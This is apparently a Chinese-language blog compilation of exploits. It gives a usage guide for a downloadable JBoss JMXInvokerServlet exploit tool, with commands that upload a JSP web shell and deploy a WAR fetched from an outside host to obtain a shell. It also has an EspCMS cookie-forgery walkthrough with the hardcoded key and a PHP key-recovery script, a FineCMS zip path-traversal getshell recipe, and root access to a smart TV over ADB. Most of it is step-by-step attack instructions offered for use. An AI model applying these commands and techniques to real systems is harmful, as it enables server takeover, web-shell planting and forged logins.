JBOSS /invoker/JMXInvokerServlet 利用工具

链接: http://pan.baidu.com/s/1F8bMI 密码: 1h2r

工具使用说明

1. 查看系统名称

java -jar jboss_exploit_fat.jar -i http://192.168.0.88:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName

2. 查看系统版本

java -jar jboss_exploit_fat.jar -i http://192.168.0.88:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion

3.远程创建文件

java -jar jboss_exploit_fat.jar -i http://192.168.0.88:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war index .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean

$content$内容是同目录下的shell.jsp文件内容

即:将shell.jsp文件上传到服务器上,最终部署的war访问:
http://192.168.0.88:10081/myname/index.jsp
如果有mynameok 表示部署成功
使用client.htm客户端进行连接即可(需要修改ip等信息)

4.远程部署war

java -jar jboss_exploit_fat.jar -i http://192.168.0.88:10081/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war

获得shell地址:
http://192.168.0.88:10081/test/shell.jsp
5.远程删除文件D:\jboss\server\default\deploy\management\myname.war\index.jsp文件

java -jar jboss_exploit_fat.jar -i http://192.168.0.88:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
6.支持输入用户名和密码 带验证的情况

java -jar jboss_exploit_fat.jar -u name -p password -i http://192.168.0.88:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
7.支持代理模式

java -jar jboss_exploit_fat.jar -P http://127.0.0.1:8080 -i http://192.168.0.88:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp

Owasp移动安全漏洞Top 10

项目地址: https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks

OWASP MOBILE TOP 10

Cookie加密算法被破解导致Cookie安全机制失效

EspCMS最新版可伪造任意帐户登陆(简单利用代码)

http://www.wooyun.org/bugs/wooyun-2010-053577

漏洞成因:ESPCMS的Cookie加密是采用ps_code变换方式得到的,其本身自带解密函数; 通过ps_code变换的因素是:用户名,位置 因此可以通过注册一个较长的用户名解方程组即可得到ps_code 得到ps_code之后便可以任意伪造Cookie 之后分析Cookie发现,用户是否登录的验证只是对Cookie中的登陆信息进行了验证,因此基于Cookie不可被伪造的安全机制被攻破,导致可任意伪造用户登陆。

该Cookie解密漏洞在最新版中依然存在!

cookie加密算法,/public/class_function.php,144-170行

function eccode($string, $operation = 'DECODE', $key = '@LFK24s224%@safS3s%1f%', $mcrype = true) {

		$result = null;

		if ($operation == 'ENCODE') {

			for ($i = 0; $i < strlen($string); $i++) {

				$char = substr($string, $i, 1);

				$keychar = substr($key, ($i % strlen($key)) - 1, 1);

				$char = chr(ord($char) + ord($keychar));

				$result.=$char;

			}

			$result = base64_encode($result);

			$result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);

		} elseif ($operation == 'DECODE') {

			$data = str_replace(array('-', '_'), array('+', '/'), $string);

			$mod4 = strlen($data) % 4;

			if ($mod4) {

				$data .= substr('====', $mod4);

			}

			$string = base64_decode($data);

			for ($i = 0; $i < strlen($string); $i++) {

				$char = substr($string, $i, 1);

				$keychar = substr($key, ($i % strlen($key)) - 1, 1);

				$char = chr(ord($char) - ord($keychar));

				$result.=$char;

			}

		}

		return $result;

	}

简单写了个计算db_pscode的,写的比较菜~

<?php 

                $string = "lmlilJRmY5RiZpdql2KV";

                $username = "111111111111111";

                $result = "";

                $mod4 = strlen($string) % 4;

                if ($mod4) {

                        $string .= substr('====', $mod4);

                }

                $de_string = base64_decode($string);

                for($i=0;$i<strlen($username);$i++){

                        $char = chr(ord($de_string[$i+1]) - ord($username[$i]));

                        $result .= $char;

                }

                echo "code=".$result;

?>

对压缩包的精巧利用getshell

finecms 最新版v2.3.3前台getshell

http://www.wooyun.org/bugs/wooyun-2014-067512

先把自己的shell改名字成aaaaaaaaaaaaaaaaaaaa.php

之所以起这个名字,就是预留一些空间,方便我之后将文件名改成../../../aaaaaaaaaaa.php而不用怕字符串长度不对。

把文件直接打包成zip,用notepad++打开:

然后把里面的aaaaaa 前9个字符改成../../../

然后就大功告成。

注册用户,来到头像上传处,上传头像

如果服务器端会自动解压缩包,则可能导致直接在网站根目录getshell

开发者模式未做控制导致电视机沦陷

惠科HKC智能电视可获得最高权限

http://www.wooyun.org/bugs/wooyun-2014-068107

漏洞成因:安卓开发者模式未做控制

漏洞利用:直接ADB shell即可以root权限登陆电视,接下来就可以进行任意操作。

经典评论:现在的小孩子太厉害了,不是在自动取款机玩贪食蛇就是在缴费机玩连连看,现在尼玛跑到电视机上了!!我家的锅盖天线打开cctv1总是自动播放av,是不是你们搞的鬼? 雷锋